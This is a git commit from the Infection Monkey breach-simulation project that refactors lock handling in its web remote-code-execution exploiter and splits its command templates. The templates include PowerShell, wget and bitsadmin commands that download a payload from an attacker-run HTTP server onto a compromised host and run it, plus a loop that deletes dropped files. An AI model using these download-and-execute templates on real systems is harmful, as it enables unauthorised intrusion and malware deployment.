Bugfix: model.__init__ changed( I forgot to add the file to the branch) and server lock is not a singleton anymore

2018-08-07 17:44:31 +03:00 · 2018-08-07 17:44:31 +03:00 · 8e684a3fad
parent 3f8d63c2d9
commit 8e684a3fad
2 changed files with 18 additions and 13 deletions
--- a/infection_monkey/exploit/web_rce.py
+++ b/infection_monkey/exploit/web_rce.py
@ -13,8 +13,6 @@ __author__ = 'VakarisZ'

 LOG = logging.getLogger(__name__)

-LOCK = Lock()
-
 class WebRCE(HostExploiter):

    def __init__(self, host):
@ -237,14 +235,15 @@ class WebRCE(HostExploiter):
            return False
        # Determine which destination path to use
        LOG.debug("Monkey path found")
+        lock = Lock()
        path = WebRCE.get_monkey_dest_path(config, src_path)
        if not path:
            return False
        # To avoid race conditions we pass a locked lock to http servers thread
-        LOCK.acquire()
+        lock.acquire()
        # Create server for http download and wait for it's startup.
-        http_path, http_thread = HTTPTools.create_locked_transfer(host, src_path, LOCK)
-        LOCK.acquire()
+        http_path, http_thread = HTTPTools.create_locked_transfer(host, src_path, lock)
+        lock.acquire()
        if not http_path:
            LOG.debug("Exploiter failed, http transfer creation failed.")
            return False
@ -278,7 +277,7 @@ class WebRCE(HostExploiter):
            LOG.info("Powershell not found in host. Using bitsadmin to download.")
            backup_command = RDP_CMDLINE_HTTP % {'monkey_path': path, 'http_path': http_path}
            resp = exploiter(url, backup_command)
-        LOCK.release()
+        lock.release()
        http_thread.join(DOWNLOAD_TIMEOUT)
        http_thread.stop()
        LOG.info("Uploading proccess finished")
--- a/infection_monkey/model/init.py
+++ b/infection_monkey/model/init.py
@ -17,13 +17,19 @@ RDP_CMDLINE_HTTP_VBS = 'set o=!TMP!\!RANDOM!.tmp&@echo Set objXMLHTTP=CreateObje
 DELAY_DELETE_CMD = 'cmd /c (for /l %%i in (1,0,2) do (ping -n 60 127.0.0.1 & del /f /q %(file_path)s & if not exist %(file_path)s exit)) > NUL 2>&1'

 # Commands used for downloading monkeys
-POWERSHELL_HTTP = "powershell -NoLogo -Command \"Invoke-WebRequest -Uri \\\'%%(http_path)s\\\' -OutFile \\\'%%(monkey_path)s\\\' -UseBasicParsing; %%(monkey_path)s %s %%(parameters)s\"" % (DROPPER_ARG, )
-WGET_HTTP = "wget -O %%(monkey_path)s %%(http_path)s && chmod +x %%(monkey_path)s && %%(monkey_path)s %s %%(parameters)s" % (DROPPER_ARG, )
-RDP_CMDLINE_HTTP = 'bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s&&start /b %%(monkey_path)s %%(type)s %%(parameters)s'
-
+POWERSHELL_HTTP_UPLOAD = "powershell -NoLogo -Command \"Invoke-WebRequest -Uri \\\'%(http_path)s\\\' -OutFile \\\'%(monkey_path)s\\\' -UseBasicParsing\""
+POWERSHELL_HTTP_UPLOAD_NOT_ESCAPED = "powershell -NoLogo -Command \"Invoke-WebRequest -Uri \'%(http_path)s\' -OutFile \'%(monkey_path)s\' -UseBasicParsing\""
+WGET_HTTP_UPLOAD = "wget -O %(monkey_path)s %(http_path)s"
+RDP_CMDLINE_HTTP = 'bitsadmin /transfer Update /download /priority high %(http_path)s %(monkey_path)s'
+CHMOD_MONKEY = "chmod +x %(monkey_path)s"
+RUN_MONKEY = " %(monkey_path)s %(monkey_type)s %(parameters)s"
 # Commands used to check for architecture and if machine is exploitable
-CHECK_WINDOWS = "echo %s && wmic os get osarchitecture" % ID_STRING
-CHECK_LINUX = "echo %s && lscpu" % ID_STRING
+CHECK_COMMAND = "echo %s" % ID_STRING
+# Architecture checking commands
+ARCH_WINDOWS = "wmic os get osarchitecture"
+ARCH_LINUX = "lscpu"

 # Commands used to check if monkeys already exists
 EXISTS = "ls %s"
+
+DOWNLOAD_TIMEOUT = 300